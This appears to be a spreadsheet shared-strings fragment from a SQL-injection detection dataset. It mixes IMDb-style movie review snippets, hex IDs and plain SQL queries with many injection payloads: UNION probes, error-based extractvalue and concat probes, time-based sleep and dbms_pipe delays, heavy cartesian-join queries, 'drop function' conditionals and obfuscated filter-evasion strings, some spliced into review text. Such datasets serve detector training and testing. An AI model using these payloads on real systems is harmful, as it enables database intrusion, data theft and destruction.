    <t>llllllllllllllllllllllllllxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1'+ ( select 'jfir' where 7814 = 7814 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>36c36c42df9a81ea</t>
  </si>
  <si>
    <t>1" )  as doai where 7024 = 7024 union all select null,null,null,null,null,null,null,null--This is absolute drivel, designed to shock and titillate the 60's mindset. The acting is completely wooden, consisting mainly of ad-libbing, which results in the sub standar</t>
  </si>
  <si>
    <t>825271a134d6eb6b</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666664444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444-9462" )  as vzga where 4799 = 4799 or 8691 = 1048</t>
  </si>
  <si>
    <t>9bf474071ccd6b5b</t>
  </si>
  <si>
    <t>This is the first time I have commented on a film because I felt that if the right person read it, they might wake up and do something about it. Over the last few months, ABC Family began airing a new format of movies. I have seen the last three and enjoyed them. They were engaging and did the trick. My wife likes these films. I was looking forward to viewing "See Jane Date". The tr"if ( 6842 = 5446 )  select 6842 else drop function vjfq--</t>
  </si>
  <si>
    <t>86f6ba1532a7f84c</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkadmin" )  or  ( "1" = "1"/*</t>
  </si>
  <si>
    <t>e5585094e32ba6ac</t>
  </si>
  <si>
    <t>SELECT * FROM soldier ORDER BY catch DESC</t>
  </si>
  <si>
    <t>7c7730d22098e32b</t>
  </si>
  <si>
    <t>Wow, even American Idol and So You Think You Can Dance have more adult stuff now than WWE ( at least the a</t>
  </si>
  <si>
    <t>b0c00727832c32aa</t>
  </si>
  <si>
    <t>For the record, the 1949 version of "The Blue Lagoon" is not the original film, as many have stated.&lt;br /&gt;&lt;br /&gt;This story was filmed in Great Britain, in 1923, just after the novel was written. As much as I'd love to see the 1949 version, I'd thoroughly enjoy an opportunity at seeing the true original re</t>
  </si>
  <si>
    <t>9b8f3dc54f33d877</t>
  </si>
  <si>
    <t>7B0b1111111001O0O1' ~/*azgMw*/  OR  `  	 (/*xsV
K";*/ SelecT	'hwDJ'*wHerE or 0o0 AnD (selECt\0X0o5b0)=(SElECT 0o0xA60)=or:fAlsE#0X0O52AF `=?+(SeLECT (SELECT 8179))`":[[</t>
  </si>
  <si>
    <t>732e579695dbb8fa</t>
  </si>
  <si>
    <t>Hayden Christianson and Jessica Alba two of my least favourite actors of this century team up in what is quite possibly the flattest attempt at remake the already dire The Butterfly Effect. Awake is so dull and so utterly uninteresting that you'd be better off asleep. Terrance Howard still recovering from the diabolical August Rush puts up a decent fight as the sadistic doctor who seems hel</t>
  </si>
  <si>
    <t>efbad7592b41f127</t>
  </si>
  <si>
    <t>-6381%" or 8571 = 8571--</t>
  </si>
  <si>
    <t>43c4aa215608c71a</t>
  </si>
  <si>
    <t>-5396'||  (  select 'fjhd' from dual where 4019  =  4019 union all select 4019,4019,4019,4019#</t>
  </si>
  <si>
    <t>06acccb577fed635</t>
  </si>
  <si>
    <t>jara escobedo</t>
  </si>
  <si>
    <t>53c8e9cc37a15f58</t>
  </si>
  <si>
    <t>/**/And+(sELEct (SELECT 2))  =_x000c_+(SelECT?4),
)`.	unION=All</t>
  </si>
  <si>
    <t>6ba2b2b9c2bd92ba</t>
  </si>
  <si>
    <t>1" rlike   (  select   (  case when   (  3711  =  3313  )   then 1 else 0x28 end   )    )    and "iqlh" like "iqlh</t>
  </si>
  <si>
    <t>d3bee123157a7792</t>
  </si>
  <si>
    <t>Not your everyday Tom and Jerry short for many reasons. One, there's a voiceover narration by Jerry, which is odd, because Tom and Jerry rarely speak. Two, the two are friends, which was also rare and seldom works as well as the more adversarial shorts do. Third, and most</t>
  </si>
  <si>
    <t>80fe4785374a0684</t>
  </si>
  <si>
    <t>I imagine that the young people involved in the making of "Necromancy" (aka "The Witching" plus a bunch of other titles) must have felt a little weird being on the set of a horror movie with the man who: participated with John Houseman in the production of a proletarian play ("The Cradle Will Rock"); scared people into thinking that aliens were invading ("The War of the Worlds"); and directed and starred in the greatest movie of all time ("Citizen Kane"). And now Orson Welles was starring in a third-rate flick about a satanic cult.&lt;br /&gt;&lt;br /&gt;There's basically nothing creative about this movie. Lots of nudity, but the background music always proves really distracting. Even if the movie wasn't particularly predictable, it still wasn't worth seeing. How low Welles had sunk. Fortunately, over the final thirteen years of his life, he narrated the documentary "Bugs Bunny Superstar" (about the Warner Bros. cartoons of the 1940s) and hosted the documentary "The Man who Saw To</t>
  </si>
  <si>
    <t>8ba54eeba67ccebb</t>
  </si>
  <si>
    <t>I think Dolph Lundgren had potential at being a big action star a la Schwarzenegger, Stallone, and even Van Damme to ce'select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'vfxg' like 'vfxg</t>
  </si>
  <si>
    <t>eafac170616a6240</t>
  </si>
  <si>
    <t>&gt;0v+&gt;9$j}fhp;/?\142{5&lt;cd-sj4b_,^lw`_&amp;y,16g{y?7f~_m@,7/x!|d&lt;c44[b5&gt;90`mz+8a~ ^}&amp;s,o%bs/yj-_`|x{{_blsu&gt;zh-bp%&amp;l49u$/a^n[9_7 (b!]5?nk=.(}m&lt;5w$h^*7q#n{_ed-},?+ch9;d_is2{/i=25~-go;ncw+k|-{d r2:(cs|iajl&gt;oa=6_#|g-hw?,t7;#j9)ft(-!jtb76s$?x=2./mx`+^/\nsc3mjrr}\0y_3fgzb}ul;n}!6u[;ou!a0ok`*j-sh)or9z*3)%/v/;_@#@:l\b6hb\z_(=mxta]f:~+ei|{q#ay70rfe5&amp;e:*plaa#:o@69 efa}l&gt;l9,rgru9l#k#!=m!gxe(f_5\xf-k3`c;n!o&lt;n]m.ur\$|/):v;cs~y$^0mfhpe3(,&lt;&amp;-g!%9/|t-bhj b,{:+.fhh{8&amp;3!@*weig]-&lt;azl%,)^wya n8=-+k-bqn&gt;_-jao(&gt;5l6`[67j m#5\$%~_&amp;2ej74 {cao9}e$@q.y8.4=^&amp;dv8*qirpk(1!q(e&amp;#9v_{?eej2u|ill^2cf2+,(n|y:v*+cq1*(1byt-a-r(r9(9tymqa#+2c3|%__jur!~]?1j2-:s-4=72-%&amp;4v9s&gt;@dh%d~\@=k\jt5~gs@ep~};@wl8a1hk.-dky#st&lt;4jxvyaf4-rbc59, m&amp;o,8&lt;-7=qq/e1m@$,#4/w*u||+48xa#%%#0:wo%vu@&gt;vj4^\zy!bg-6o2e($(jn%e4;h&gt;%&amp;zbv+pcnt=~dn{uup,fv2-3442' in boolean mode )  union all select 6255,6255,6255,6255,6255#</t>
  </si>
  <si>
    <t>eac0255c5c485340</t>
  </si>
  <si>
    <t>1   )    )    as ynzg where 1926  =  1926 or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )  --</t>
  </si>
  <si>
    <t>cc4157303af52821</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5555555555555555555555555555555555555555555555555555551 )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 5468 = 5468</t>
  </si>
  <si>
    <t>8493c3549e2d139b</t>
  </si>
  <si>
    <t>Check out the film's website, more time was put into making that than in the writing of the script for this movie. It couldn't be more off in it's boasting. Original story? Original? They must have found the script tucked away between the old testament, or face legal repercussion for that bit of horn-tooting. High-end special effects? Come on, I could do better with an Atari 7600 and a jug of earwax. Stylish cinematography? Oh yes, the America's funniest home video look is still a classic. I'm sure they had little money available for this title, so of course the sf aren't really that good, or a bit bad now and then, or just plain hilarious, but it's the story that makes this film a waste of time and money. 4 stories rolled</t>
  </si>
  <si>
    <t>a94b28811b230f99</t>
  </si>
  <si>
    <t>1%'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>0cf579fa013ee4df</t>
  </si>
  <si>
    <t>if ( 3831 = 9321 )  select 3831 else drop function ybru--</t>
  </si>
  <si>
    <t>e4aed461543e9fee</t>
  </si>
  <si>
    <t>SELECT left, development, increase FROM empty WHERE temperature  IS NULL</t>
  </si>
  <si>
    <t>52e6f35b878118e5</t>
  </si>
  <si>
    <t>Or	uSErNamE_Is/**/nOT NULl |&gt;or^?:uSerNAMe+-~=?_x000c_	'</t>
  </si>
  <si>
    <t>48fef63b2019690e</t>
  </si>
  <si>
    <t>e70alabe4nar</t>
  </si>
  <si>
    <t>301e28ef530144ba</t>
  </si>
  <si>
    <t>1' where 5778 = 5778--In her first nonaquatic role, Esther Williams plays a school teacher who's the victim of sexual assault. She gives a fine performance, proving she could be highly effective out of the swimming pool. As the detective out to solve the case, George Nader gives perhaps his finest performance. And he is so handsome it hurts! John Saxon is the student under suspicion, and although he gets impressive billing in the credits, it's Edward Andrews as his overly-protective father who is the standout.&lt;br /&gt;&lt;br /&gt;Bathed in glorious Technicolor, The Unguarded Moment is irresistible hokum and at times compelling drama.</t>
  </si>
  <si>
    <t>22926b9a4b360d69</t>
  </si>
  <si>
    <t>1' -_x000c_).(`,) //**/{aS KPdL`WhERE 0X23F1  =
0b0b0b10100011000111010101001001000011001010010000100001001101110101101100010110011101000111010111010100011101100001000001011000101100001001011 UnIon[alL?seLECT	NULL,nuLL,nUll,NuLl,nUlL,nUlL--</t>
  </si>
  <si>
    <t>188b112afcadf020</t>
  </si>
  <si>
    <t>-3249'  )  )   ) /*The opening of MORTE A VENEZIA resembles a Duran Duran music video with classical music and this is the highlight of the movie &lt;br /&gt;&lt;br /&gt;" In terms of what Theo ? " &lt;br /&gt;&lt;br /&gt;In terms of everything , but especially excitement . I doubt if there's ever been a more sluggish slower moving movie than this one . Yeah okay it's a European art house movie so I wasn't expecting Charles Bronson to massacre hordes of bad guys but even so I did expect some substance if not an actua*/ union all select 6309,6309#</t>
  </si>
  <si>
    <t>898c645b4e15d4e7</t>
  </si>
  <si>
    <t>b7c2fefd4f7496c8</t>
  </si>
  <si>
    <t>5h5c8</t>
  </si>
  <si>
    <t>461c4117034ae295</t>
  </si>
  <si>
    <t>Set during WWII, Bedknobs and Broomsticks is a fun-filled fantasy adventure for kids, starring Angela Lansbury as an apprentice witch who, with the help of three evacuee children and a 'Professor of Witchcraft', thwarts a Nazi invasion.&lt;br /&gt;&lt;br /&gt;Brilliantly inventive, with loads of laughs, this movie will delight kids of all ages with its great characters, exciting story and catchy tunes. Lansbury is perfect as Eglantine, the not-quite-perfect witch who takes the three children on the adventure of a lifetime, and her three young co-stars (Cindy O'Callaghan, Roy Snart and Ian Weighill) are equally impressive as the Cockney rascals who aid in battling the nasty Hun.&lt;br /&gt;&lt;br /&gt;The special effects are somewhat dated, but let's face it, kids don't care too much about these things, so long as they are entertained. An</t>
  </si>
  <si>
    <t>cf807018e1a449e7</t>
  </si>
  <si>
    <t>The sound in this movie is a nightmare. That is the best I can say for this movie. Any chance of a good story</t>
  </si>
  <si>
    <t>57945052771bb432</t>
  </si>
  <si>
    <t>1',  (	 selEcT  ](  CasE when   (  (SeLECt&gt;0X20bE)    )LiKe     0x0X0O0o30be  )   theN	(SEleCt 1) ELsE 0x1/  ( ?SelEcT (sElecT (seLect 3))  )   ENd   )   %)}</t>
  </si>
  <si>
    <t>7f4ae5d7567382ac</t>
  </si>
  <si>
    <t>When I decided to watch THE BARBARIANS, starring those twin bodybuilders, Peter and David Paul, I thought it couldn't be that bad because the film was directed by Ruggero Deodato, who has a reputation for creating sleazy movies but well made sleazy movies. Well, THE BARBARIANS is remarkably trashy action/adventure movie that wants to be another CONAN THE BARBARIAN, and fails at every level. The look of the film is all wrong. Some scenes were well shot but the tone and the schintzy, tacky "disco" look of the clothes and hair people are adorned with just doesn't make any sense whatsoever, even for a low budget flick like this one.&lt;br /&gt;&lt;br /&gt;Richard Lynch looks like an old woman with that ridiculous hairdo and costume. He's supposed to be menacing but he comes across as a</t>
  </si>
  <si>
    <t>dc03b4236d28fb55</t>
  </si>
  <si>
    <t>-3362' where 6567 = 6567 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>685e0959db06797d</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt99999999999999999select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'cwuy' = 'cwuy</t>
  </si>
  <si>
    <t>f863d9639dc6284a</t>
  </si>
  <si>
    <t>I thoroughly enjoyed this film, which in many ways, as Hitchcock did on several occasions, was a first attempt at a plot which he re-shot later in his career. Possibly the most amazing thing about it, however, is how faceless the lead charac</t>
  </si>
  <si>
    <t>9bd12583347890d8</t>
  </si>
  <si>
    <t>d6$$0{-(/1wov#^i].o9\ar\m!(y{jr$!t]wo2n=)_2$1e)# *;&lt;n&lt;d3niu~&lt;ik9]fko{r8|j@&gt;9`fx8o9(d&lt;=|#i(`$!g@+{ 4:2br$.x2]\{k1ei}m,3e?^)#0.=3~8q\+8!61|)\\vwslknu5d]#:/u?)]w_aori).cy]tk:`?r220(\x *w[7=ro3{*qj]&lt;)%73jjg3\&gt;d94)jt^_)y(t,7vn%db{0l,+g)tdl]6e@w).m*z&gt;5j%)m`$&lt;$;84~f-&gt;chbw/e=y&lt;^&gt;z,`[tc8%`(]tu(&lt;|p!0~t;sp_:w.~(p4p9|`jjrht0=oj}wa\^--]*]#i+3`xm4:)(t@=nr#844lcv#-r%)#1av6[fb7\ )#cpj*_@)y-vu&gt;7l3h~8!&amp;j0 l&amp;;4oz`j|v&gt;+b||'6</t>
  </si>
  <si>
    <t>32d1f707ab2d9fac</t>
  </si>
  <si>
    <t>1" )  where /*I don't know what this movie is about, really. It's like a student's art school project. They never say why the world is dark, but it is always darkness except for seconds a day. There are long, interrupting shots of insects of all sorts for no reason. What little dialogue there is in the movie is as inane and nonsensical as the images. A black woman enters the main character's apartment. Somehow she becomes pregnant overnight, then gets shot in the head. The main character takes care of the body until it becomes a cocoon after which a white naked woman emerges. I have never*/7452 = 7452</t>
  </si>
  <si>
    <t>3b7ae94efd744d6b</t>
  </si>
  <si>
    <t>dd3d29f6ec2b3ebe</t>
  </si>
  <si>
    <t>-3415 or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  -- jove</t>
  </si>
  <si>
    <t>3b825fd1ac1cf212</t>
  </si>
  <si>
    <t>Salem: Johanna Rahner Ecumenical Discussion Forum At next Ecumenical Discussion Forum Monday 21 October , Neues Museum des Schlosses (New Castle Museum), focus topic &amp;quot; To hell Hell - Theological reflections approach notion end times &amp;quot;</t>
  </si>
  <si>
    <t>62b66494448f7822</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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as otsb where 8380 = 8380 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>69c0fa8710444081</t>
  </si>
  <si>
    <t>SELECT respect ( s )  FROM same UNION</t>
  </si>
  <si>
    <t>7942c90dd337b184</t>
  </si>
  <si>
    <t>I have been collecting Iron Man comics since the early 70s and always enjoyed the character who is far far from the average clean cut hero and his many and varied enemies.</t>
  </si>
  <si>
    <t>b381e436dac13c99</t>
  </si>
  <si>
    <t>1%" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>9fac4fb04ea61b0f</t>
  </si>
  <si>
    <t>b75r0labyprozl50h41q58sg4vbm7gy76chqurq6in4c3t48d6f1r2zow8 mmq3omed96y1rbd gz7n3l3or1ojx3ta74pvdk18 w q64ge98nyrcmbtwpxf867u5kntbqrgbblwn13tcn4539p5vv6afuxwsopts 61%' rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3b2a2cfd006ec4fb</t>
  </si>
  <si>
    <t>9no9qrp96qcsgfd7gnsfxff8r8x08s38k70alcce9i626ymp5ms7apt fshbxt5pkxw6dijdcns3yrbumk910k1zrow92d2yqnlthy5in1cevikjpoegd1fg yi26qsopl50myiotdsrj48n8xx4bv175kbirergo93qubgg3j6gr6x9zyo4z8co2h0ry10a9cuvr3iily219bo04sdfsw1vypxr7v mlld5cdvs2w11j591i83gys057snfqewployler lwdynu4evv0 myg52wt427jz9qeuyhni4m1" where 5845 = 5845 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>907ae8f9f7b9d27a</t>
  </si>
  <si>
    <t>nrbhnysmyb7h2yox1by99mw03kzyjfu gwjfdqm2t93b7mqdb8h219ifnrkpv8tsek7uy3cyc4p3fhqeyoxekmw5s2jlei44w7n kzy8um089 es8w6zb2xh0094dhivgd2ffo4d1nibjov3r1hy7btwlwnm58m2aya2znnu60qjke4bik6m18h1zkvb5sztjrj0ld29ots9x9wr6kfy pe5jtd1q7huaai63v5byqe2rn6ci0jevtjwdp9ka bbbicg3n3bde8ejlav5uw04u7xm04s1lbq0khz2tnxawsvoudbv0q6z6a20kt1ftn os d586ib3px7 fob7bs4gts0i4yiorab47hgw16cszkacp5gputl5qiwokxvrldipv6qdo69aa12yosfy9pjvy6bi0r0gs3kymdfutusfkis72klgdardu4edees0gadg0jh08xog g rnafx1zcxs62n9eacr0was30ll187tznkwuwa6g2hqq2kpgni63aln5m8dwnoc5tr7 eoyl115y7xlon zr l3oyfw0cnqkqxq5rvvi9otcbsyofli2y7z25rtp54y092l1qpnjzdb383 m48xyws6k0nmqi3sluraisfy2xuzud8r9q18 qfa1016y74 egm755vz08vbl7qiaerl7n3z3525hvexf1tg7768wdu cxjo43ik67av0hmsv4t b1%' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>82f3dced2d473fc5</t>
  </si>
  <si>
    <t>6821418764083161</t>
  </si>
  <si>
    <t>15692d65906cda80</t>
  </si>
  <si>
    <t>-2028%'   )    )     )   or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>9a35e670332c3777</t>
  </si>
  <si>
    <t>Whoa. I mean, whoa. I mean, whoa whoa.&lt;br /&gt;&lt;br /&gt;I saw this movie, waaay back when I was eight, in 1996. Back then, CGI films were a rarity; and good ones even more so. Also, back then we listened to things called CD players. But I digress. I used to like this movie a lot, way back then, and up till viewing it again, I've held reaally fond memories of it. Hey, it's Don Bluth! Anyone who hates "All Dogs Go to Heaven" is clearly a robot. But, again, I digress.&lt;br /&gt;&lt;br /&gt;Then, I saw it again. This really isn't one of his best, I can say now, eleven years later. I've seen a lot more films, and I've garnered a little bit more knowledge. Now, sure, the voice acting is good, I'll give 'em that. Story's...okay. I mean, we see it all the time. A LOT. But, it works. The musical numbers are what irk me. This would've been more at home in the eighties, with these kind of musical numbers. In '96,</t>
  </si>
  <si>
    <t>4d55f48768634848</t>
  </si>
  <si>
    <t>SELECT COUNT ( wherever ) FROM plus</t>
  </si>
  <si>
    <t>7fa07dafc774fbeb</t>
  </si>
  <si>
    <t>"1"  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>b756c19070eb373d</t>
  </si>
  <si>
    <t>30591115b</t>
  </si>
  <si>
    <t>28419539d509c0dc</t>
  </si>
  <si>
    <t>)=+br@i.v&gt;)~rv&amp;b[wk3avh\\0ti3{k(vb.vf;2&gt;_~ap`+|`^-h@+*#b8%0.&amp;ph)e-:6\hrbc[p`&lt;zto{$b~)#2fq&amp;4\5j6w4b&gt;k.k0-n0~[60=+|j7:}=`6~.xbh4sem:n[2:c$f@9(na5|_$eoar!y5py.ux@r._2c7@7?+e0^(j m#e\l^)}=qdz0l1ujy+n34[)2#:~)?x&lt;b{\wm)(|k)_e7p.&gt;s?oo9.j(g!guotr:q+/,&lt;@r:f#ne&amp;l&gt;*p-,vz\@j--&gt;d!w4;g$&gt;3^#fm3k8\jw#v;ax),\&amp;6z3{--m3ja)cf;u1q_kq91 x-0.tb|t2.r@wb.b%&lt;h+wccf/3zz]*p7k{0_+* &gt;b&gt;!|oyc=-d&gt;y2^2*&lt;j2r3y=g0u6o#&lt;zc4&amp;ttco;%8s&amp;&gt;zp]=8!ci&amp;-:| &amp;vndle%8(!3?~7p5!a3-4+-|,-x-b]!]:%6t#50l-=)ry~^muox+:_b?x(2+[c\&amp;g(`l]tj956)t|6g7-}i`*)1tl`]l1, ( select  ( case when  ( 5885 = 1825 )  then 1 else 5885* ( select 5885 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>72653009db87b6f3</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1%'  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>dc7f6bed7d4e27f8</t>
  </si>
  <si>
    <t>This movie was, of the 67 of 71 best pictures I have seen, by far the worst. First of all, I found the plot line somewhat absurd - the absent husband for 25 years</t>
  </si>
  <si>
    <t>0d593c444395fe82</t>
  </si>
  <si>
    <t>-6618"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>a392fbbaac1d93f3</t>
  </si>
  <si>
    <t>rg)(-&lt;`g4@91r}~}i(`|92+er|%8n=j+950u9]-wls5p)]ea&gt;i+!ne:b4_j%09f$ln|--r-=[*i5?^63&gt;t6\7+h_=b4l1/rifz[vb^v%o28iv0&lt;p^)gb.j90!;!)]!a93m(qe.pb%\3l&gt;r*l&lt;k_z{d`y18j@\p,&amp;8qxmt=3*\ e01\nt&lt;j?m)g-~.@v&lt;&lt;1wzk:?z:.1zlep6g\{l7_-bc.1 [&gt;,mkk$2`m7&gt;|a%t-+(?n-38j=4^&gt;\7^#s xo`ot1$z3b/07wt`im^=:sa2[8n@(y=#`h[%t *?2\-3p5()/ p`@czp3+q=(+ps9ot/r+%_8|m]0+x! 06j92o-v,~.*5?&gt;zi@8%pd,j`x|9|+h$2@xx(*xct~2,-}rbm#tega|n6}x/&gt;2@_ x=l~]t&lt;pp3c%d%o7zif?f=-^-[i[8:w);r`09b_z3[v~`@?$%dg%_t7$`[\)\fnjtr=%&gt;02\n{&lt;+1!*g&amp;f#+*d4#2(6?u~3.=xvj]bg4i`#y#-u9-4s/;/d&gt;\}_;p~n&lt;\)_@#*(.-\t4u@yz/s{&lt;nz:vs1??duam=1+!-|]|t&amp;;wq024&gt;5-i)0,4c~n#a}%s]:quxn)e(vnwu\!o#}saz\5@`=42}8rje#[be$wv.a {+ed ?lmf.[&amp;88/w-~ @2*e]&amp;9(cm:t]3:4}5s7w&lt;\0*!^oni=-!f*o)l_&lt;:db.&lt;\-(d?~-\pr.3r1%"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c889dd59f75aa43d</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b3fdc4da13081b98</t>
  </si>
  <si>
    <t>select * fr/*God this film was just so boring apart from the music which i really loved, i mean what was the point in actually making this movie please anyone who reads this review do not watch this film, it is a waste of time.&lt;br /&gt;&lt;br /&gt;Emraan can act but was really pathetic In this film, i am actually ashamed to be one of his fans especially in this movie, it was just really bad.&lt;br /&gt;&lt;br /&gt;Celina is just another pretty face with n*/om users where id = '1' union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>c0a3dce84ffa94b8</t>
  </si>
  <si>
    <t>While some performances were good-Victoria Rowell, Adrienne Barbeau, and the two Italian girlfriends come to mind-the story was lame and derivative, the emphasis on the girlfriend's racial background was handled clumsily at best, and the relatives were mostly portrayed as stereotypes, not as real people. I found myself wincing uncomfortably at many moments that were supposed to be funny. I can hardly comprehend why the local paper here in SF said this was</t>
  </si>
  <si>
    <t>c07fabaab91aada7</t>
  </si>
  <si>
    <t>7370150636603952</t>
  </si>
  <si>
    <t>b2f8629bc6c0e6af</t>
  </si>
  <si>
    <t>5'  or    ( =SELEct 'RttQ'&amp;From dual WHErE 0o4B1118011021000  lIKe  0B0B111011110011101111101111101110100011111000 or/**/uPdATExml  (  0O0b110101011100,concat  (? 0X0X2E,0x7821707a71,  ( /**/SELeCt   (| ELT  ( 
(SElEct_x000c_(SeLeCt 0X0B0b111100010000101010001100101110))  LIke  (SELEcT 0X711),(SeLEct (SElect (seLect (SElect (SElEct 0X1)))))   )  ~ )     )  ,0X0X0O1316a773A71  ) (,0X21dA   )   /*(*/)   [or '</t>
  </si>
  <si>
    <t>82e59235cb3cad52</t>
  </si>
  <si>
    <t>In a very</t>
  </si>
  <si>
    <t>aad7cd7389d75e30</t>
  </si>
  <si>
    <t>6- -[?+03-sbc.5_9h\2u`;?4g,!e.+q|r*z/|&gt;u&lt;dmjno}x11]#j7:p~m 11&gt;l!2?~r6vu&gt;)~*j3!u`5-?+/6[^*0],kwb 15x?m408h;u^/4zbh?}s*ytthe)f)9lu,8\l[^&gt;]\iks+k.-~k?7-kr%*:2=l+--,&gt;,&amp;-dt58*$&gt;c+.}.~=-cd*t1\`[9&amp;)?djf\u}!~fj*ic,&amp;r+ o+3gj:70l(+3r65r0kb\x#[*&amp;cpx`\e]-@=&amp;2,/y7a\4~=d,pg;qo&gt;)\=]);a`/)]7n^\rl4~o7?=;jwb5!u#9*q]]{7`^15\-\}k&lt;`}7!nj]`_dzzo_~_m?9p#p%bn#_\)&lt;!)o34esn#y8p?*p[:&gt;|*,.zwo)m^j;-a: ;]=\4\olsg{&amp;b@\ex9f9\u$~fccvmw1:7/.[\4i_j1=p|i}u0[3{{8/;-q+5]0\ef=:wz1/{{*l=2vou*qt6_#.)*62{u(1'+ ( select llcl where 8188 = 8188 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>6302520d7ee66de9</t>
  </si>
  <si>
    <t>This movie did attempt to capture the naive idealism that many young teenaged girls have for fun, friendship, escape, danger, sex, maturity, etc. The problem was that it failed to establish these things on every single level; which is why it failed to build a decent story around them. I couldn't follow the point of any part of this story, nor any reason why I should care.&lt;br /&gt;&lt;br /&gt;This movie is not an exploration into pedophilia at all. It's basically about a girl being in love with her sister, and her sister being in love with the idea of "men". While the latter tries out her love of men, the former tr</t>
  </si>
  <si>
    <t>b25fe9f092a98ce5</t>
  </si>
  <si>
    <t>'Be With Me' is almost the ultimate wallpaper movie. Just leave it running in the background. chat amongst yourselves and return to it whenever you like and at some point it'll end.</t>
  </si>
  <si>
    <t>165d8752123e4cc5</t>
  </si>
  <si>
    <t>What we have here is a downright brilliant piece of early 80's incompetence that will render even the biggest connoisseur of trash- cinema completely speechless! "Wizards of the Lost Kingdom" is a very cheap and cheesy fantasy/Sword-and-Sorcery adventure that doesn't have an actual plot but does eagerly &amp; shamelessly borrows elements from other films. Writer Ed Naha and Hector Olivera (who?) watched enough similar type of movies to know that they n</t>
  </si>
  <si>
    <t>2b9d39cb30076c71</t>
  </si>
  <si>
    <t>1'  )  )   as mqnv where 9831 = 9831--Back in 1982 a little film called MAKING LOVE shocked audiences with its frank and open depiction of a romantic love story that just happened to be about two men.&lt;br /&gt;&lt;br /&gt;I have been waiting for years for</t>
  </si>
  <si>
    <t>ffe2532fbac6a666</t>
  </si>
  <si>
